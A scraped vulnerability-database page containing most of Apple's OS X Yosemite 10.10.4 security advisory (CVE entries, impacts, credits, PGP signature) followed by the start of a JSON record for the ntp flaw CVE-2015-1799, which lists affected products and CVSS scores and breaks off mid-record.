IOFireWireFamily Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple null pointer dereference issues existed in the FireWire driver. These issues were addressed through improved error checking. CVE-ID CVE-2015-3707 : Roberto Paleari and Aristide Fattori of Emaze Networks
Kernel Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: A memory management issue existed in the handling of APIs related to kernel extensions which could have led to the disclosure of kernel memory layout. This issue was addressed through improved memory management. CVE-ID CVE-2015-3720 : Stefan Esser
Kernel Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: A memory management issue existed in the handling of HFS parameters which could have led to the disclosure of kernel memory layout. This issue was addressed through improved memory management. CVE-ID CVE-2015-3721 : Ian Beer of Google Project Zero
kext tools Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to overwrite arbitrary files Description: kextd followed symbolic links while creating a new file. This issue was addressed through improved handling of symbolic links. CVE-ID CVE-2015-3708 : Ian Beer of Google Project Zero
kext tools Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A local user may be able to load unsigned kernel extensions Description: A time-of-check time-of-use (TOCTOU) race condition condition existed while validating the paths of kernel extensions. This issue was addressed through improved checks to validate the path of the kernel extensions. CVE-ID CVE-2015-3709 : Ian Beer of Google Project Zero
Mail Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A maliciously crafted email can replace the message content with an arbitrary webpage when the message is viewed Description: An issue existed in the support for HTML email which allowed message content to be refreshed with an arbitrary webpage. The issue was addressed through restricted support for HTML content. CVE-ID CVE-2015-3710 : Aaron Sigel of vtty.com, Jan Soucek
ntfs Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in NTFS that could have led to the disclosure of kernel memory content. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3711 : Peter Rutenbar working with HP's Zero Day Initiative
ntp Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: An attacker in a privileged position may be able to perform a denial of service attack against two ntp clients Description: Multiple issues existed in the authentication of ntp packets being received by configured end-points. These issues were addressed through improved connection state management. CVE-ID CVE-2015-1798 CVE-2015-1799
OpenSSL Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Multiple issues exist in OpenSSL, including one that may allow an attacker to intercept connections to a server that supports export-grade ciphers Description: Multiple issues existed in OpenSSL 0.9.8zd which were addressed by updating OpenSSL to version 0.9.8zf. CVE-ID CVE-2015-0209 CVE-2015-0286 CVE-2015-0287 CVE-2015-0288 CVE-2015-0289 CVE-2015-0293
QuickTime Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in QuickTime. These issues were addressed through improved memory handling. CVE-ID CVE-2015-3661 : G. Geshev working with HP's Zero Day Initiative CVE-2015-3662 : kdot working with HP's Zero Day Initiative CVE-2015-3663 : kdot working with HP's Zero Day Initiative CVE-2015-3666 : Steven Seeley of Source Incite working with HP's Zero Day Initiative CVE-2015-3667 : Ryan Pentney, Richard Johnson of Cisco Talos and Kai Lu of Fortinet's FortiGuard Labs, Ryan Pentney, and Richard Johnson of Cisco Talos and Kai Lu of Fortinet's FortiGuard Labs CVE-2015-3668 : Kai Lu of Fortinet's FortiGuard Labs CVE-2015-3713 : Apple
Security Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the Security framework code for parsing S/MIME e-mail and some other signed or encrypted objects. This issue was addressed through improved validity checking. CVE-ID CVE-2013-1741
Security Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Tampered applications may not be prevented from launching Description: Apps using custom resource rules may have been susceptible to tampering that would not have invalidated the signature. This issue was addressed with improved resource validation. CVE-ID CVE-2015-3714 : Joshua Pitts of Leviathan Security Group
Security Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to bypass code signing checks Description: An issue existed where code signing did not verify libraries loaded outside the application bundle. This issue was addressed with improved bundle verification. CVE-ID CVE-2015-3715 : Patrick Wardle of Synack
Spotlight Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Searching for a malicious file with Spotlight may lead to command injection Description: A command injection vulnerability existed in the handling of filenames of photos added to the local photo library. This issue was addressed through improved input validation. CVE-ID CVE-2015-3716 : Apple
SQLite Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: Multiple buffer overflows existed in SQLite's printf implementation. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-3717 : Peter Rutenbar working with HP's Zero Day Initiative
System Stats Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious app may be able to compromise systemstatsd Description: A type confusion issue existed in systemstatsd's handling of interprocess communication. By sending a maliciously formatted message to systemstatsd, it may have been possible to execute arbitrary code as the systemstatsd process. The issue was addressed through additional type checking. CVE-ID CVE-2015-3718 : Roberto Paleari and Aristide Fattori of Emaze Networks
TrueTypeScaler Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-3719 : John Villamil (@day6reak), Yahoo Pentest Team
zip Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Extracting a maliciously crafted zip file using the unzip tool may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in the handling of zip files. These issues were addressed through improved memory handling. CVE-ID
CVE-2014-8139 CVE-2014-8140 CVE-2014-8141
OS X Yosemite 10.10.4 includes the security content of Safari 8.0.7. https://support.apple.com/en-us/HT204950
OS X Yosemite 10.10.4 and Security Update 2015-005 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2 Comment: GPGTools - http://gpgtools.org
iQIcBAEBCAAGBQJVksFmAAoJEBcWfLTuOo7tV1AQAIYpkOMpHp181b+70sgyZ/Ue mFM527FFGDfLLuIW6LTcBsEFe9cfZxumB8eOFPirTNRK7krsVMo1W+faHXyWOnx7 kbWylHdhaoxnX+A6Gj0vP71V6TNNsTi9+2dmdmHUnwxZ7Ws5QCNKebumUG3MMXXo EKxE5SNSNKyMSSYmliS26cdl8fWrmg9qTxiZQnxjOCrg/CNAolgVIRRfdMUL7i4w aGAyrlJXOxFOuNkqdHX2luccuHFV7aW/dIXQ4MyjiRNl/bWrBQmQlneLLpPdFZlH cMfGa2/baaNaCbU/GqhNKbO4fKYVaqQWzfUrtqX0+bRv2wmOq33ARy9KE23bYTvL U4E9x9z87LsLXGAdjUi6MDe5g87DcmwIEigfF6/EHbDYa/2VvSdIa74XRv/JCN1+ aftHLotin76h4qV/dCAPf5J/Fr/1KFCM0IphhG7p+7fVTfyy7YDXNBiKCEZzLf8U TUWLUCgQhobtakqwzQJ5qyF8u63xzVXj8oeTOw6iiY/BLlj9def5LMm/z6ZKGTyC 3c4+Sy5XvBHZoeiwdcndTVpnFbmmjZRdeqtdW/zX5mHnxXPa3lZiGoBDhHQgIg6J 1tTVtnO1JSLXVYDR6Evx1EH10Vgkt2wAGTLjljSLwtckoEqc78qMAT1G5U4nFffI +gGm5FbAxjxElgA/gbaq =KLda -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201504-0362", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "lte", "trust": 1.0, "vendor": "ntp", "version": "4.2.7p444" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "arista", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "freebsd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ntp", "version": null }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.9.5" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.10 to 10.10.3" }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.x" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "3.x" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.8.5" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.2.8p2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56003" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.16" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "ids/ips", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "8.3.0.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.3" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.1" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.7.16" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "purview", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3.0.182" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.16" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.3" }, { "model": "extremexos", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "15.6.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.3" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.4.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.5" }, { "model": "extremexos", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "16.1.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "ids/ips", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "8.3.0.350" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56002" }, { "model": "ios xr software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.10.4" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "21.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.75" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.3" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "network convergence system series routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60005.0.1" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "16.2" }, { "model": "unified computing system central software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "network convergence system series routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60005.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.3" }, { "model": "nac", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3.0.182" }, { "model": "automation stratix", "scope": "ne", "trust": 0.3, "vendor": "rockwell", "version": "590015.6.3" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56001" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.6" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "netsight", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3.0.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.15" }, { "model": "identifi wireless", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "10.11" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.7" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "network time protocol", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "4.2.8" }, { "model": "extremexos", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "21.1.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77100" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.4" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.0" }, { "model": "automation stratix", "scope": "eq", "trust": 0.3, "vendor": "rockwell", "version": "59000" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.68" }, { "model": "purview", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3.0.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "extremexos", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "16.2.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.10" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9.6" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "summit wm3000 series", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "meinberg", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.6" }, { "model": "smartcloud provisioning for software virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2" }, { "model": "nac", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3.0.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.4" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9" }, { "model": "identifi wireless", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "10.11.1" }, { "model": "extremexos", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "unified computing system central software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1" }, { "model": "netsight", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3.0.182" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.1" } ], "sources": [ { "db": "CERT/CC", "id": "VU#374268" }, { "db": "BID", "id": "73950" }, { "db": "JVNDB", "id": "JVNDB-2015-002116" }, { "db": "NVD", "id": "CVE-2015-1799" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.2.7p444", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-1799" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Miroslav Lichv\u0026amp;amp;amp;amp;amp;aacute;r of Red Hat", "sources": [ { "db": "BID", "id": "73950" } ], "trust": 0.3 }, "cve": "CVE-2015-1799", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 5.5, "impactScore": 4.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:A/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Adjacent Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 4.3, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2015-1799", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:A/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2015-1799", "trust": 1.8, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2015-1799", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-1799" }, { "db": "JVNDB", "id": "JVNDB-2015-002116" }, { "db": "NVD", "id": "CVE-2015-1799" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { 